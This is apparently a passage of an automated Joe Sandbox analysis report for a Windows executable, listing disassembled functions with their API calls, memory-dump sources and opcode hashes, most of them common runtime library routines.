                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3621893840-0
                                                                                                                                                                                                                                                        • Opcode ID: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                                                                                                                                                                                                                                        • Instruction ID: 591a9b2131b47461ab27739f0d626d53373543ece297115729cffff6780df897
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6F06262B3844682FB549760E455B7A2211FFE4705FA42034D64EC19949F2DD549CB50
                                                                                                                                                                                                                                                        Function 00007FF6063A97EC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __except_validate_context_recordabort
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 746414643-3733052814
                                                                                                                                                                                                                                                        • Opcode ID: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                                                                                                                                                                                                                                        • Instruction ID: 1384a42aa7e95823cb4bf1d01bd9d7696d4bc66a0d9f5816a02d41166681d426
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4771D132A186C18ADF688F25D4803B97BA1FB01B84F24A136DE8DA7AC5CF3DD550D780
                                                                                                                                                                                                                                                        Function 00007FF6063AB54C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: $*
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                                                        • Opcode ID: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                                                                                                                                                                                                                                        • Instruction ID: f335d98a6e267bdf928fec1df166a4638985889fea52d16aeb2ba05e3b13bf12
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051567290D6428AEF6D8E39805437C7BA0EB15B59F343235C64BC12E5CF2ED481E781
                                                                                                                                                                                                                                                        Function 00007FF6063A9C30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2466640111-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                                                                                                                                                                                                                        • Instruction ID: 65beef816cf72d60ca186645a4bd94a4421b2baf4b6109a2f899db63d8aa3cbd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF516037A2874187DA24AB15E4402AE77A4FB88B90F202535DB8D87B56CF3ED451DB40
                                                                                                                                                                                                                                                        Function 00007FF6063B7874 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                                                                                                        • Instruction ID: 6eaaa4c3e12ff9b0bac75f565b8d22eff184027021ab96fe1bbeb53d21591ded
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F41B322B29A4582EB248F65E8443BAB7A1FB88794F546031EF4EC7788DF3DD541C780
                                                                                                                                                                                                                                                        Function 00007FF60639CCEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ObjectRelease
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1429681911-3916222277
                                                                                                                                                                                                                                                        • Opcode ID: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                                                                                                        • Instruction ID: 83e67acfab24940dc50781b0ba45e5409975887fe8605c387e66b0087b3ea2ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A317E3661874186DB08DF22B80872AB7A0FB88FD1F205139ED4E83B94DF7DD9498B40
                                                                                                                                                                                                                                                        Function 00007FF60639C21C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CapsDeviceRelease
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 127614599-3916222277
                                                                                                                                                                                                                                                        • Opcode ID: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                                                                                                        • Instruction ID: 8f8c91e03ec58067819f038dbae12dc7de42508454a5b133db888b5a54cbe29f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36E08C21B0864582EB4C57B6F58A02A2261AB8CBD0F256039DA0E83784ED3EC8854300
                                                                                                                                                                                                                                                        Function 00007FF606387644 Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2025052027-0
                                                                                                                                                                                                                                                        • Opcode ID: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
                                                                                                                                                                                                                                                        • Instruction ID: fbc8d544642922ab4d5e333d3cd4512126c2bc37b86f02d6d9513a85e64cfcbd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8B1D322F2874685EE188B19D4445BD63B2FB44B94F74A131EA1DC77A0DFBEE490C380
                                                                                                                                                                                                                                                        Function 00007FF60638FCDC Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                        • Opcode ID: 1322f54df97993b4a5ad684f415525a173c6a5f006958d4a0014ba66ba559ceb
                                                                                                                                                                                                                                                        • Instruction ID: 839a93d6ec6cc002e500342faa6b63ed8ce5329ea94e9d95c0278578018c455b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1322f54df97993b4a5ad684f415525a173c6a5f006958d4a0014ba66ba559ceb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A551C472B14B4289FB089B74D4442EC2321EB84BD8F607236EA1CD37A6EE6DE545C380
                                                                                                                                                                                                                                                        Function 00007FF60639D908 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1077098981-0
                                                                                                                                                                                                                                                        • Opcode ID: 02d44a4f672a4ff076bd7af01b23eac749c9e801f4074d58631ddee5945a2c64
                                                                                                                                                                                                                                                        • Instruction ID: 2b7178b6a03099645e2dfae00256e21a1c206f1410f4affa503fc5937f44eeed
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02d44a4f672a4ff076bd7af01b23eac749c9e801f4074d58631ddee5945a2c64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA518332A18B4286EB548F61E44476E73B4FF84B88F602035EA4E97B58DF3DD954CB90
                                                                                                                                                                                                                                                        Function 00007FF6063B106C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4141327611-0
                                                                                                                                                                                                                                                        • Opcode ID: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                                                                                                        • Instruction ID: 9b16c6e4ad54e5726da307605beca2b3508b6e7ea28db6db09cf76c8cea42331
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E418431E18A4286FB6D9B11D460379A7A0EF90B90F387130DB5D86AD5DF3ED8418780
                                                                                                                                                                                                                                                        Function 00007FF6063B4008 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B4021
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B4083
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B40BD
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B40E7
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1557788787-0
                                                                                                                                                                                                                                                        • Opcode ID: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                                                                                                                                                                                                                                        • Instruction ID: 36c381dcd0b102c8c9d28ef306850ec0317f91106e2b7e9e0da64ccd0e41cd5f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27216421F08F5585E6289F126440029F6E4FF54BD0B187134DF9EA7B9ADF3DE4528344
                                                                                                                                                                                                                                                        Function 00007FF6063B0950 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6063AB380,?,?,00000050,00007FF6063AD3C1), ref: 00007FF6063B095A
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6063AB380,?,?,00000050,00007FF6063AD3C1), ref: 00007FF6063B09C2
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6063AB380,?,?,00000050,00007FF6063AD3C1), ref: 00007FF6063B09D8
                                                                                                                                                                                                                                                        • abort.LIBCMT ref: 00007FF6063B09DE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1447195878-0
                                                                                                                                                                                                                                                        • Opcode ID: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                                                                                                                                                                                                                                        • Instruction ID: 9dfe0ae4bcd51b985a51ce9c41891d207f5dd7767f2024a7334e8e62f846846a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF015E10B0DE4646FA5C6731965523EA1919F44790F343638EB6FC27E6EF2EE8404290
                                                                                                                                                                                                                                                        Function 00007FF60639C1CC Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                                                                                                                                        • Opcode ID: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                                                                                                                                                                                                                                        • Instruction ID: 907188e906dc8171a8570e26a4820ccf7afc69ac25d32fb669e016a588023340
